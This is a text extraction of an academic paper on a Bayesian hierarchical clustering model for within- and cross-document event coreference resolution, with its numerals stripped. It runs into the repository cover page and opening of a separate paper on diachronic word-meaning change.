major drawback of this general approach is that it makes hard decisions on the merging and splitting of clusters based on heuristics derived from the pairwise distances. in addition, it only captures pairwise coreference deci- sions within a single document and can not account for signals that commonly appear across documents. more recently, bejan and harabagiu ( ; ) proposed several nonparametric bayesian models for event coreference resolution that probabilisti- cally infer event clusters both within a document and across multiple documents. their method, however, is completely unsupervised, and thus can not en- code any readily available supervisory information to guide the model toward better event clustering. to address these limitations, we propose a novel bayesian model for within- and cross-document event coreference resolution. it leverages super- vised feature-rich modeling of pairwise coreference relations and generative modeling of cluster distri- butions, and thus allows for both probabilistic in- ference over event clusters and easy incorporation of pairwise linking preferences. our model builds on the framework of the distance-dependent chi- nese restaurant process (ddcrp) (blei and frazier, ), which was introduced to incorporate data de- pendencies into nonparametric clustering models. here, however, we extend the ddcrp to allow the incorporation of feature-based, learnable dis- tance functions as clustering priors, thus encourag- ing event mentions that are close in meaning to be- long to the same cluster. in addition, we introduce to the ddcrp a representational hierarchy that allows event mentions to be grouped within a document and within-document event clusters to be grouped across documents. to investigate the effectiveness of our approach, we conduct extensive experiments on the ecb+ cor- pus (cybulska and vossen, b), an extension to eventcorefbank (ecb) (bejan and harabagiu, ) and the largest corpus available that contains event coreference annotations within and across documents. we show that integrating pairwise learning of event coreference relations with unsu- pervised hierarchical modeling of event clustering achieves promising improvements over state-of-the- art approaches for within- and cross-document event coreference resolution. related work coreference resolution in general is a difficult natu- ral language processing (nlp) task and typically re- quires sophisticated inferentially-based knowledge- intensive models (kehler, ). extensive work in the literature focuses on the problem of entity coref- erence resolution and many techniques have been developed, including rule-based deterministic mod- els (e.g. cardie and wagstaff ( ), raghunathan et al. ( ), lee et al. ( )) that traverse over mentions in certain orderings and make determin- istic coreference decisions based on all available information at the time; supervised learning-based models (e.g. stoyanov et al. ( ), rahman and ng ( ), durrett and klein ( )) that make use of rich linguistic features and the annotated corpora to learn more powerful coreference functions; and fi- nally, unsupervised models (e.g. bhattacharya and getoor ( ), haghighi and klein ( , )) that successfully apply generative modeling to the coreference resolution problem. event coreference resolution is a more complex task than entity coreference resolution (humphreys et al., ) and also has been relatively less stud- ied. existing work has adapted similar ideas to those used in entity coreference. humphreys et al. ( ) first proposed a deterministic cluster- ing mechanism to group event mentions of pre- specified types based on hard constraints. later ap- proaches (ahn, ; chen et al., ) applied learning-based pairwise classification decisions us- ing event-specific features to infer event clustering. bejan and harabagiu ( ; ) proposed sev- eral unsupervised generative models for event men- tion clustering based on the hierarchical dirichlet process (hdp) (teh et al., ). our approach is related to both supervised clustering and gener- ative clustering approaches. it is a nonparametric bayesian model in nature but encodes rich linguis- tic features in clustering priors. more recent work modeled both entity and event information in event coreference. lee et al. ( ) showed that itera- tively merging entity and event clusters can boost the clustering performance. liu et al. ( ) demon- strated the benefits of propagating information be- tween event arguments and event mentions during a post-processing step. other work modeled event coreference as a predicate argument alignment prob- lem between pairs of sentences, and trained clas- sifiers for making alignment decisions (roth and frank, ; wolfe et al., ). our model also leverages event argument information into the de- cisions of event coreference but incorporates it into bayesian clustering priors. most existing coreference models, both for events and entities, focus on solving the within-document coreference problem. cross-document coreference has attracted less attention due to lack of annotated corpora and the requirement for larger model capac- ity. hierarchical models (singh et al., ; wick et al., ; haghighi and klein, ) have been pop- ular choices for cross-document coreference as they can capture coreference at multiple levels of gran- ularities. our model is also hierarchical, capturing both within- and cross-document coreference. our model is also closely related to the distance-dependent chinese restaurant process (ddcrp) (blei and frazier, ). the ddcrp is an infinite clustering model that can account for data dependencies (ghosh et al., ; socher et al., ). but it is a flat clustering model and thus can- not capture hierarchical structure that usually exists in large data collections. very little work has ex- plored the use of ddcrp in hierarchical clustering models. kim and oh ( ; ghosh et al. ( ) combined a ddcrp with a standard crp in a two- level hierarchy analogous to the hdp with restricted distance functions. ghosh et al. ( ) proposed a two-level ddcrp with data-dependent distance- based priors at both levels. our model is also a two- level ddcrp model but differs in that its distance function is learned using a feature-rich log-linear model. we also derive an effective gibbs sampler for posterior inference. action bombs participant sudan, yida refugee camp time thursday, nov , location south sudan table : mentions of event components problem formulation we adopt the terminology from ecb+ (cybulska and vossen, b), a corpus that extends the widely used eventcorefbank (ecb (bejan and harabagiu, )). an event is something that happens or a sit- uation that occurs (cybulska and vossen, a). it consists of four components: ( ) an action: what happens in the event; ( ) participants: who or what is involved; ( ) a time: when the event happens; and ( ) a location: where the event happens. we as- sume that each document in the corpus consists of a set of mentions — text spans — that describe event actions, their participants, times, and locations. ta- ble shows examples of these in the sentence “su- dan bombs yida refugee camp in south sudan on thursday, nov th, .” in this paper, we also use the term event men- tion to refer to the mention of an event action, and event arguments to refer collectively to mentions of the participants, times and locations involved in the event. event mentions are usually noun phrases or verb phrases that clearly describe events. two event mentions are considered coreferent if they refer to the same actual event, i.e. a situation involving a par- ticular combination of action, participants, time and location. note that in text, not all event arguments are always present for an event mention; they may even be distributed over different sentences. thus whether two event mentions are coreferential should be determined based on the context. for example, in figure , the event mention dropped in docu- ment corefers with air strike in the same docu- ment as they describe the same event, plane bombs yida camp, in the discourse context; it also corefers with dropped in document based on the con- texts of both documents. the problem of event coreference resolution can be divided into two sub-problems: ( ) event ex- traction: extracting event mentions and event ar- guments, and ( ) event clustering: grouping event mentions into clusters according to their corefer- ence relations. we consider both within- and cross- document event coreference resolution and hypothe- size that leveraging context information from multi- ple documents will improve both within- and cross- document coreference resolution. in the following, we first describe the event extraction step and then focus on the event clustering step. event extraction the goal of event extraction is to extract from a text all event mentions (actions) and event arguments (the associated participants, times and locations). one might expect that event actions could be ex- tracted reasonably well by identifying verb groups; and event arguments, by applying semantic role la- beling (srl) to identify, for example, the agent and patient of each predicate. unfortunately, most srl systems only handle verbal predicates and so would miss event mentions described via noun phrases. in addition, srl systems are not designed to capture event-specific arguments. accordingly, we found that a state-of-the-art srl system (swirl (sur- deanu et al., )) extracted only % of the ac- tions, % of participants, % of times and % of locations for events in a development set of ecb+ based on a head word matching evaluation measure. (we provide dataset details in section .) to produce higher recall, we adopt a supervised approach and train an event extractor using sen- tences from ecb+, which are annotated for event actions, participants, times and locations. be- cause these mentions vary widely in their length and grammatical type, we employ semi-markov crfs (sarawagi and cohen, ) using the loss- augmented objective of yang and cardie ( ) that provides more accurate detection of mention bound- aries. we make use of a rich feature set that includes word-level features such as unigrams, bigrams, pos tags, wordnet hypernyms, synonyms and framenet semantic roles, and phrase-level features such as phrasal syntax (e.g., np, vp) and phrasal embed- dings (constructed by averaging word embeddings produced by word vec (mikolov et al., )). our experiments on the same (held-out) development data show that the semi-crf-based extractor cor- rectly identifies % of actions, % of participants, % of times and % of locations again based on head word matching. note that the semi-crf extractor identifies event mentions and event arguments but not relation- ships among them, i.e. it does not associate argu- ments with an event mention. lacking supervi- sory data in the ecb+ corpus for training an event action-argument relation detector, we assume that all event arguments identified by the semi-crf ex- tractor are related to all event mentions in the same sentence and then apply srl-based heuristics to augment and further disambiguate intra-sentential action-argument relations (using the swirl srl). more specifically, we link each verbal event men- tion to the participants that match its arg , arg or arg semantic role fillers; similarly, we asso- ciate with the event mention the time and locations that match its am-tmp and am-loc role fillers, re- spectively. for each nominal event mention, we as- sociate those participants that match the possessor of the mention since these were suggested in lee et al. ( ) as playing the arg role for nominal predi- cates. event clustering now we describe our proposed bayesian model for event clustering. our model is a hierarchical exten- sion of the distance-dependent chinese restaurant process (ddcrp). it first groups event mentions within a document to form within-document event cluster and then groups these event clusters across documents to form global clusters. the model can account for the similarity between event mentions during the clustering process, putting a bias toward clusters comprised of event mentions that are simi- lar to each other based on the context. to capture event similarity, we use a log-linear model with rich syntactic and semantic features, and learn the feature weights using gold-standard data. . distance-dependent chinese restaurant process the distance-dependent chinese restaurant pro- cess (ddcrp) is a generalization of the chinese restaurant process (crp) that models distributions over partitions. in a crp, the generative process can be described by imagining data points as customers in a restaurant and the partitioning of data as tables at which the customers sit. the process randomly samples the table assignment for each customer se- quentially: the probability of a customer sitting at an existing table is proportional to the number of cus- tomers already sitting at that table and the probabil- ity of sitting at a new table is proportional to a scal- ing parameter. for each customer sitting at the same table, an observation can be drawn from a distri- bution determined by the parameter associated with that table. despite the sequential sampling process, the crp makes the assumption of exchangeability: the permutation of the customer ordering does not change the probability of the partitions. the exchangeability assumption may not be rea- sonable for clustering data that has clear inter- dependencies. the ddcrp allows the incorporation of data dependencies in infinite clustering, encour- aging data points that are closer to each other to be grouped together. in the generative process, instead of directly sampling a table assignment for each cus- tomer, it samples a customer link, linking the cus- tomer to another customer or itself. the clustering can be uniquely constructed once the customer links are determined for all customers: two customers be- long to the same cluster if and only if one can reach the other by traversing the customer links (treating these links as undirected). more formally, consider a sequence of customers , ...,n, and denote a = (a , ...,an) as the assign- ments of the customer links. ai ∈ { , . . . ,n} is drawn from p(ai = j|f,α) ∝ { f(i,j), j = i α, j = i ( ) where f is a distance function and f(i,j) is a value that measures the distance between customer i and j. α is a scaling parameter, measuring self-affinity. for each customer, the observation is generated by the per-table parameters as in the crp. a ddcrp is said to be sequential if f(i,j) = when i < j, so customers may link only to themselves, and to previous customers. . a hierarchical extension of the ddcrp we can model within-document coreference reso- lution using a sequential ddcrp. imagining cus- tomers as event mentions and the restaurant as a document, each mention can either refer to an an- tecedent mention in the document or no other men- tions, starting the description of a new event. how- ever, the coreference relations may also exist across documents — the same event may be described in multiple documents. thus it is ideal to have a two- level clustering model that can group event men- tions within a document and further group them across documents. therefore we propose a hierar- chical extension of the ddcrp (hddcrp) that em- ploys a ddcrp twice: the first-level ddcrp links mentions based on within-document distances and the-second level ddcrp links the within-document clusters based on cross-document distances, forming larger clusters in the corpus. the generative process of an hddcrp can be described using the same “chinese restaurant” metaphor. imagine a collection of documents as a collection of restaurants, and the event mentions in each document as customers entering a restaurant. the local (within-document) event clusters corre- spond to tables. the global (within-corpus) event clusters correspond to menus (tables that serve the same menu belong to the same cluster). the hid- den variables are the customer links and the table links. figure shows a configuration of these vari- ables and the corresponding clustering structure. figure : a cluster configuration generated by the hdd- crp. each restaurant is represented by a rectangle. the small green circles represent customers. the ovals repre- sent tables and the colors reflect the clustering. each cus- tomer is assigned a customer link (a solid arrow), linking to itself or another customer in the same restaurant. the customer who first sits at the table is assigned a table link (a dashed arrow), linking to itself or another customer in a different restaurant, resulting in the linking of two tables. more formally, the generative process for the hd- dcrp can be described as follows: . for each restaurant d ∈ { , ...,d}, for each customer i ∈ { , ...,nd}, sample a customer link using a sequential ddcrp: p(ai,d = (j,d)) ∝    fd(i,j), j < i αd, j = i , j > i ( ) . for each restaurant d ∈{ , ...,d}, for each ta- ble t, sample a table link for the customer (i,d) who first sits at t using a ddcrp: p(ci,d = (j,d ′)) ∝ { f ((i,d),(j,d ′)), j ∈{ , ...,nd′},d′ = d α , j = i,d ′ = d ( ) . calculate clusters z(a,c) by traversing all the customer links a and the table links c. two customers are in the same cluster if and only if there is a path from one to the other along the links, where we treat both table and customer links as undirected. . for each cluster k ∈ z(a,c), sample parame- ters φk ∼ g (λ). . for each customer i in cluster k, sample an ob- servation xi ∼ p(·|φzi) where zi = k. f :d and f are distance functions that map a pair of customers to a distance value. we will discuss them in detail in section . . . posterior inference with gibbs sampling the central computation problem for the hddcrp model is posterior inference — computing the con- ditional distribution of the hidden variables given the observations p(a,c|x,α ,f ,α :d,f :d). the pos- terior is intractable due to a combinatorial number of possible link configurations. thus we approxi- mate the posterior using markov chain monte carlo (mcmc) sampling, and specifically using a gibbs sampler. in developing this gibbs sampler, we first observe that the generative process is equivalent to one that, in step samples a table link for all customers, and then in step , when calculating z(a,c), in- cludes only those table links ci,d originating at cus- tomers (i,d) that started a new table, i.e. that chose ai,d = (i,d). the gibbs sampler for the hddcrp iteratively samples a customer link for each customer (i,d) from p(a∗i,d|a−(i,d),c,x,λ) ∝ p(a∗i,d)ha(x,z,λ) ( ) where ha(x,z,λ) = p(x|z(a−(i,d) ∪a∗i,d,c,λ)) p(x|z(a−(i,d),c),λ)) after sampling all the customer links, it samples a table link for all customers (i,d) according to p(c∗i,d|a,c−(i,d),x,λ) ∝ p(c∗i,d)hc(x,z,λ) ( ) where hc(x,z,λ) = p(x|z(a,c−(i,d) ∪ c∗i,d,λ)) p(x|z(a,c−(i,d)),λ)) for those customers (i,d) that did not start a new table, i.e. with ai,d = (i,d), the table link c∗i,d does not affect the clustering, and so hc(x,z,λ) = in this case. referring back to the event coreference example in , figure shows an example of variable config- uration for the hddcrp model and the correspond- ing coreference clusters. a = a = a = a = a = c = c = c = c = c = [ina] figure : an example of event clustering and the cor- responding variable assignments. the assignments of a induce tables, or within-document (wd) clusters, and the assignments of c induce menus, or cross-document (cd) clusters. [ina] denotes that the variable is inactive and will not affect the clustering. in implementation, we can simplify the computa- tions of both ha(x,z,λ) and hc(x,z,λ) by using the fact that the likelihood under clustering z(a,c) can be factorized as p(x|z(a,c),λ) = ∏ k∈z(a,c) p(xz=k|λ) where xz=k denotes all customers that belong to the global cluster k. p(xz=k|λ) is the marginal proba- bility. it can be computed as p(xz=k|λ) = ∫ p(φ|λ) ∏ i∈z=k p(xi|φ)dφ where xi is the observation associated with cus- tomer i. in our problem, the observation corre- sponds to the lemmatized words in the event men- tion. we model the observed word counts using cluster-specific multinomial distributions with sym- metric dirichlet priors. . feature-based distance functions the distance functions f :d and f encode the pri- ors for the clustering distribution, preferring cluster- ing data points that are closer to each other. we con- sider event mentions as the data points and encode the similarity (or compatibility) between event men- tions as priors for event clustering. specifically, we use a log-linear model to estimate the similarity be- tween a pair of event mentions (xi,xj) fθ(xi,xj) ∝ exp{θt ψ(xi,xj)} ( ) where ψ is a feature vector, containing a rich set of features based on event mentions i and j: ( ) head word string match, ( ) head pos pair, ( ) co- sine similarity between the head word embeddings (we use the pre-trained -dimensional word em- beddings from word vec ), ( ) similarity between the words in the event mentions (based on term fre- quency (tf) vectors), ( ) the jaccard coefficient be- tween the wordnet synonyms of the head words, and ( ) similarity between the context words (a win- dow of three words before and after each event men- tion). if both event mentions involve participants, we consider the similarity between the words in the participant mentions based on the tf vectors, sim- ilarly for the time mentions and the location men- tions. if the srl role information is available, we also consider the similarity between words in each srl role, i.e. arg , arg , arg . training we train the parameter θ using logis- tic regression with an l regularizer. we construct the training data by considering all ordered pairs https://code.google.com/p/word vec/ train dev test total # documents # sentences , , , # annotated event mentions , , , # cross-document chains , # within-document chains , , , table : statistics of the ecb+ corpus of event mentions within a document, and also all pairs of event mentions across similar documents. to measure document similarity, we collect all men- tions of events, participants, times and locations in each document and compute the cosine similarity between the tf vectors constructed from all the event-related mentions. we consider two documents to be similar if their tf-based similarity is above a threshold σ (we set it to . in our experiments). after learning θ, we set the within- document distances as fd(i,j) = fθ(xi,xj), and the across-document distances as f ((i,d),(j,d ′)) = w(d,d′)fθ(xi,d,xj,d′), where w(d,d′) = exp(γsim(d,d′)) captures document similarity where sim(d,d′) is the tf-based sim- ilarity between document d and d′, and γ is a weight parameter. higher γ leads to a higher effect of document-level similarities on the linking probabilities. we set γ = in our experiments. experiments we conduct experiments using the ecb+ cor- pus (cybulska and vossen, b), the largest available dataset with annotations of both within- document (wd) and cross-document (cd) event coreference resolution. it extends ecb . (lee et al., ) and ecb (bejan and harabagiu, ) by adding event argument and argument type an- notations as well as adding more news documents. the cross-document coreference annotations only exist in documents that describe the same seminal event (the event that triggers the topic of the docu- ment and has interconnections with the majority of events from its surrounding textual context (bejan and harabagiu, )). we divide the dataset into a training set (topics - ), a development set (topics - ), and a test set (topics - ). table shows the statistics of the data. we performed event coreference resolution on all possible event mentions that are expressed in the documents. using the event extraction method de- scribed in section , we extracted , event men- tions, , participant mentions, , time men- tions and , location mentions in the test data, covering . %, . %, . %, . % of the an- notated event mentions, participants, time and loca- tions, respectively. we evaluate both within- and cross-document event coreference resolution. as in previous work (bejan and harabagiu, ), we evaluate cross-document coreference resolution by merg- ing all documents from the same seminal event into a meta-document and then evaluate the meta- document as in within-document coreference reso- lution. however, during inference time, we do not assume the knowledge of the mapping of documents to seminal events. we consider three widely used coreference reso- lution metrics: ( ) muc (vilain et al., ), which measures how many gold (predicted) cluster merg- ing operations are needed to recover each predicted (gold) cluster; ( ) b (bagga and baldwin, ), which measures the proportion of overlap between the predicted and gold clusters for each mention and computes the average scores; and ( ) ceaf (luo, ) (ceafe), which measures the best alignment of the gold-standard and predicted clusters. we also consider the conll f , which is the average f of the above three measures. all the scores are com- puted using the latest version (v . ) of the official conll scorer (pradhan et al., ). . baselines we compare our proposed hddcrp model (hdd- crp) to five baselines: • lemma: a heuristic method that groups all event mentions, either within or across docu- ments, which have the same lemmatized head word. it is usually considered a strong baseline for event coreference resolution. • agglomerative: a supervised clustering method for within-document event corefer- ence (chen et al., ). we extend it to within- and cross-document event coreference by performing single-link clustering in two phases: first grouping mentions within doc- uments and then grouping within-document clusters to larger clusters across documents. we compute the pairwise-linkage scores using the log-linear model described in section . . • hdp-lex: an unsupervised bayesian clus- tering model for within- and cross-document event coreference (bejan and harabagiu, ) . it is a hierarchical dirichlet process (hdp) model with the likelihood of all the lem- matized words observed in the event mentions. in general, the hdp can be formulated using a two-level sequential crp. our hddcrp model is a two-level ddcrp that generalizes the hdp to allow data dependencies to be incorporated at both levels . • ddcrp: a ddcrp model we develop for event coreference resolution. it applies the distance prior in equation to all pairs of event men- tions in the corpus, ignoring the document boundaries. it uses the same likelihood func- tion and the same log-linear model to learn the distance values as hddcrp. but it has fewer link variables than hddcrp and it does not distinguish between the within-document and cross-document link variables. for the same clustering structure, hddcrp can gener- ate more possible link configurations than dd- crp. • hddcrp∗: a variant of the proposed hddcrp that only incorporates the within-document de- pendencies but not the cross-document depen- dencies. the generative process of hddcrp∗ is similar to the one described in section . , ex- cept that in step , for each table t, we sample we re-implement the proposed hdp-based models: the hdp f , hdpflat (including hdpflat (lf), (lf+wf), and (lf+wf+sf)) and hdpstruct, but found that the hdpflat with lexical features (lf) performs the best in our experiments. we refer to it as hdp-lex. note that hdp-lex is not a special case of hddcrp be- cause we define the table-level distance function as the distances between customers instead of between tables. in our model, the probability of linking a table t to another table s depends on the distance between the head customer at table t and all other customers who sit at table s. defining the table-level distance function this way allows us to derive a tractable inference algo- rithm using gibbs sampling. a cluster assignment ct according to p(ct = k) ∝ { nk, k ≤ k α , k = k + where k is the number of existing clusters, nk is the number of existing tables that be- long to cluster k, α is the concentration param- eter. and in step , the clusters z(a,c) are con- structed by traversing the customer links and looking up the cluster assignments for the ob- tained tables. we also use gibbs sampling for inference. . parameter settings for all the bayesian models, the reported results are averaged results over five mcmc runs, each for iterations. we found that mixing happens before iterations in all models by observing the joint log-likelihood. for the ddcrp, hddcrp∗ and hdd- crp, we randomly initialized the link variables. be- fore initialization, we assume that each mention be- longs to its own cluster. we assume mentions are ordered according to their appearance within a doc- ument, but we do not assume any particular ordering of documents. we also truncated the pairwise men- tion similarity to zero if it is below . as we found that it leads to better performance on the develop- ment set. we set α = ... = αd = . , α = . for hddcrp, α = for hddcrp∗, α = . for dd- crp, and λ = − . all the hyperparameters were set based on the development data. . main results table shows the event coreference results. we can see that lemma-matching is a strong baseline for event coreference resolution. hdp-lex provides noticeable improvements, suggesting the benefit of using an infinite mixture model for event cluster- ing. agglomerative further improves the per- formance over hdp-lex for wd resolution, how- ever, it fails to improve cd resolution. we conjec- ture that this is due to the combination of ineffective thresholding and the prediction errors on the pair- wise distances between mention pairs across docu- ments. overall, hddcrp∗ outperforms all the base- lines in conll f for both wd and cd evaluation. the clear performance gains over hdp-lex demon- strate that it is important to account for pairwise mention dependencies in the generative modeling of event clustering. the improvements over agglom- erative indicate that it is more effective to model mention-pair dependencies as clustering priors than as heuristics for deterministic clustering. comparing among the hddcrp-related models, we can see that hddcrp clearly outperforms dd- crp, demonstrating the benefits of incorporating the hierarchy into the model. hddcrp also performs better than hddcrp∗ in wd conll f , indicat- ing that incorporating cross-document information helps within-document clustering. we can also see that hddcrp performs similarly to hddcrp∗ in cd conll f due to the lower b f , in particular, the decrease in b recall. this is because apply- ing the ddcrp prior at both within- and cross- document levels results in more conservative clus- tering and produces smaller clusters. this could be potentially improved by employing more accurate similarity priors. to further understand the effect of modeling mention-pair dependencies, we analyze the impact of the features in the mention-pair similarity model. table lists the learned weights of some top features (sorted by weights). we can see that they mainly serve to discriminate event mentions based on the head word similarity (especially embedding-based similarity) and the context word similarity. event argument information such as srl arg , srl arg , and participant are also indicative of the coreferen- tial relations. . discussion we found that hddcrp corrects many errors made by the traditional agglomerative clustering model (agglomerative) and the unsupervised genera- tive model (hdp-lex). agglomerative easily suffers from error propagation as the errors made by the supervised distance learner cannot be cor- rected. hdp-lex often mistakenly groups mentions together based on word co-occurrence statistics but not the apparent similarity features in the mentions. in contrast, hddcrp avoids such errors by perform- ing probabilistic modeling of clustering and mak- ing use of rich linguistic features trained on avail- able annotated data. for example, hddcrp cor- rectly groups the event mention “unveiled” in “ap- ple’s phil schiller unveiled a revamped macbook muc b ceafe conll p r f p r f p r f f cross-document event coreference resolution (cd) lemma . . . . . . . . . . hdp-lex . . . . . . . . . . agglomerative . . . . . . . . . . ddcrp . . . . . . . . . . hddcrp∗ . . . . . . . . . . hddcrp . . . . . . . . . . within-document event coreference resolution (wd) lemma . . . . . . . . . . hdp-lex . . . . . . . . . . agglomerative . . . . . . . . . . ddcrp . . . . . . . . . . hddcrp∗ . . . . . . . . . . hddcrp . . . . . . . . . . table : within- and cross-document coreference results on the ecb+ corpus pro today” together with the event mention “an- nounced” in “this notebook isn’t the only laptop ap- ple announced for the macbook pro lineup today”, while both hdp-lex and agglomerative models fail to make such connection. by looking further into the errors, we found that a lot of mistakes made by hddcrp are due to the errors in event extraction and pairwise linkage pre- diction. the event extraction errors include false positive and false negative event mentions and event arguments, boundary errors for the extracted men- tions, and argument association errors. the pairwise linking errors often come from the lack of seman- tic and world knowledge, and this applies to both event mentions and event arguments, especially for time and location arguments which are less likely to be repeatedly mentioned and in many cases re- quire external knowledge to resolve their meanings, e.g., “may , ” is “friday” and “mount cook” is “new zealand’s highest peak”. conclusion in this paper we propose a novel bayesian model for within- and cross-document event coreference resolution. it leverages the advantages of genera- tive modeling of coreference resolution and feature- rich discriminative modeling of mention reference relations. we have shown its power in resolving event coreference by comparing it to a traditional ag- features weight head embedding sim . string match . context sim . synonym sim . tf sim . srl arg sim . srl arg sim . participant sim . table : learned weights for selected features glomerative clustering approach and a state-of-the- art unsupervised generative clustering approach. it is worth noting that our model is general and can be easily applied to other clustering problems involving feature-rich objects and cluster sharing across data groups. while the model can effectively cluster ob- jects of a single type, it would be interesting to ex- tend it to allow joint clustering of objects of different types, e.g., events and entities. acknowledgments we thank cristian danescu-niculescu-mizil, igor labutov, lillian lee, moontae lee, jon park, chen- hao tan, and other cornell nlp seminar partici- pants and the reviewers for their helpful comments. this work was supported in part by nsf grant iis- and darpa deft grant fa - - - . the third author was supported by nsf career cmmi- , nsf iis- , afosr fa - - - , afosr fa - - - , and the acsf avf. the views and conclu- sions contained herein are those of the authors and should not be interpreted as necessarily represent- ing the official policies or endorsements, either ex- pressed or implied, of nsf, darpa or the u.s. government. references david ahn. . the stages of event extraction. in proceedings of the workshop on annotating and rea- soning about time and events, pages – . amit bagga and breck baldwin. . algorithms for scoring coreference chains. in the first international conference on language resources and evaluation workshop on linguistics coreference, volume , pages – . cosmin adrian bejan and sanda harabagiu. . un- supervised event coreference resolution with rich lin- guistic features. in acl, pages – . cosmin adrian bejan and sanda harabagiu. . un- supervised event coreference resolution. computa- tional linguistics, ( ): – . indrajit bhattacharya and lise getoor. . a latent dirichlet model for unsupervised entity resolution. in sdm, volume , page . david m. blei and peter i. frazier. . distance de- pendent chinese restaurant processes. the journal of machine learning research, : – . claire cardie and kiri wagstaff. . noun phrase coreference as clustering. in proceedings of the joint sigdat conference on empirical methods in natural language processing and very large cor- pora, pages – . zheng chen, heng ji, and robert haralick. . a pairwise event coreference model, feature impact and evaluation for event coreference resolution. in pro- ceedings of the workshop on events in emerging text types, pages – . agata cybulska and piek vossen. a. guidelines for ecb+ annotation of events and their coreference. technical report, nwr- - , vu university ams- terdam. agata cybulska and piek vossen. b. using a sledgehammer to crack a nut? lexical diversity and event coreference resolution. in proceedings of the th language resources and evaluation conference (lrec ), pages – . greg durrett and dan klein. . easy victories and uphill battles in coreference resolution. in emnlp, pages – . soumya ghosh, andrei b. ungureanu, erik b. sudderth, and david m. blei. . spatial distance depen- dent chinese restaurant processes for image segmen- tation. in advances in neural information processing systems, pages – . soumya ghosh, michalis raptis, leonid sigal, and erik b. sudderth. . nonparametric clustering with distance dependent hierarchies. aria haghighi and dan klein. . unsupervised coreference resolution in a nonparametric bayesian model. in acl, volume , page . aria haghighi and dan klein. . coreference reso- lution in a modular, entity-centered model. in naacl, pages – . kevin humphreys, robert gaizauskas, and saliha az- zam. . event coreference for information extrac- tion. in proceedings of a workshop on operational factors in practical, robust anaphora resolution for unrestricted texts, pages – . andrew kehler. . coherence, reference, and the theory of grammar. csli publications stanford, ca. dongwoo kim and alice oh. . accounting for data dependencies within a hierarchical dirichlet process mixture model. in proceedings of the th acm inter- national conference on information and knowledge management, pages – . heeyoung lee, yves peirsman, angel chang, nathanael chambers, mihai surdeanu, and dan jurafsky. . stanford’s multi-pass sieve coreference resolution sys- tem at the conll- shared task. in proceedings of the fifteenth conference on computational natural language learning: shared task, pages – . heeyoung lee, marta recasens, angel chang, mihai surdeanu, and dan jurafsky. . joint entity and event coreference resolution across documents. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning, pages – . zhengzhong liu, jun araki, eduard hovy, and teruko mitamura. . supervised within-document event coreference using information propagation. in pro- ceedings of the international conference on language resources and evaluation. xiaoqiang luo. . on coreference resolution perfor- mance metrics. in emnlp, pages – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. proceedings of workshop at iclr. vincent ng and claire cardie. . improving ma- chine learning approaches to coreference resolution. in acl, pages – . vincent ng. . supervised noun phrase coreference research: the first fifteen years. in acl, pages – . sameer pradhan, xiaoqiang luo, marta recasens, ed- uard hovy, vincent ng, and michael strube. . scoring coreference partitions of predicted mentions: a reference implementation. in acl, pages – . karthik raghunathan, heeyoung lee, sudarshan ran- garajan, nathanael chambers, mihai surdeanu, dan jurafsky, and christopher manning. . a multi- pass sieve for coreference resolution. in emnlp, pages – . altaf rahman and vincent ng. . coreference reso- lution with world knowledge. in acl, pages – . michael roth and anette frank. . aligning pred- icate argument structures in monolingual comparable texts: a new corpus for a new task. in semeval, pages – . sunita sarawagi and william w. cohen. . semi- markov conditional random fields for information ex- traction. in advances in neural information process- ing systems, pages – . sameer singh, michael wick, and andrew mccallum. . distantly labeling data for large scale cross- document coreference. arxiv: . . richard socher, andrew l. maas, and christopher d. manning. . spectral chinese restaurant pro- cesses: nonparametric clustering based on similari- ties. in international conference on artificial intel- ligence and statistics, pages – . veselin stoyanov, nathan gilbert, claire cardie, and ellen riloff. . conundrums in noun phrase coref- erence resolution: making sense of the state-of-the- art. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp: volume -volume , pages – . mihai surdeanu, lluı́s màrquez, xavier carreras, and pere r. comas. . combination strategies for se- mantic role labeling. journal of artificial intelligence research, pages – . yee whye teh, michael i. jordan, matthew j. beal, and david m. blei. . hierarchical dirichlet pro- cesses. journal of the american statistical associa- tion, ( ). marc vilain, john burger, john aberdeen, dennis con- nolly, and lynette hirschman. . a model- theoretic coreference scoring scheme. in proceed- ings of the th conference on message understanding, pages – . michael wick, sameer singh, and andrew mccallum. . a discriminative hierarchical model for fast coreference at large scale. in acl, pages – . travis wolfe, mark dredze, and benjamin van durme. . predicate argument alignment using a global coherence model. in naacl, pages – . bishan yang and claire cardie. . joint modeling of opinion expression extraction and attribute classifi- cation. transactions of the association for computa- tional linguistics, : – . edinburgh research explorer a bayesian model of diachronic meaning change citation for published version: frermann, l & lapata, m , 'a bayesian model of diachronic meaning change', transactions of the association for computational linguistics, vol. , pp. - . <https://transacl.org/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/a-bayesian-model-of-diachronic-meaning-change(d f -eee - e - bc- b b d ef).html a bayesian model of diachronic meaning change lea frermann and mirella lapata institute for language, cognition and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab l.frermann@ed.ac.uk, mlap@inf.ed.ac.uk abstract word meanings change over time and an au- tomated procedure for extracting this infor- mation from text would be useful for histor- ical exploratory studies, information retrieval or question answering. we present a dy- namic bayesian model of diachronic meaning change, which infers temporal word represen- tations as a set of senses and their prevalence. unlike previous work, we explicitly model language change as a smooth, gradual pro- cess. we experimentally show that this model- ing decision is beneficial: our model performs competitively on meaning change detection tasks whilst inducing discernible word senses and their development over time. application of our model to the semeval- temporal classification benchmark datasets further re- veals that it performs on par with highly op- timized task-specific systems. introduction language is a dynamic system, constantly evolv- ing and adapting to the needs of its users and their environment (aitchison, ). words in all lan- guages naturally exhibit a range of senses whose dis- tribution or prevalence varies according to the genre and register of the discourse as well as its historical context. as an example, consider the word cute which according to the oxford english dictionary (oed, stevenson ) first appeared in the early th century and originally meant clever or keen- witted. by the late th century cute was used in throughout this paper we denote words in true type, their senses in italics, and sense-specific context words as {lists}. the same sense as cunning. today it mostly refers to objects or people perceived as attractive, pretty or sweet. another example is the word 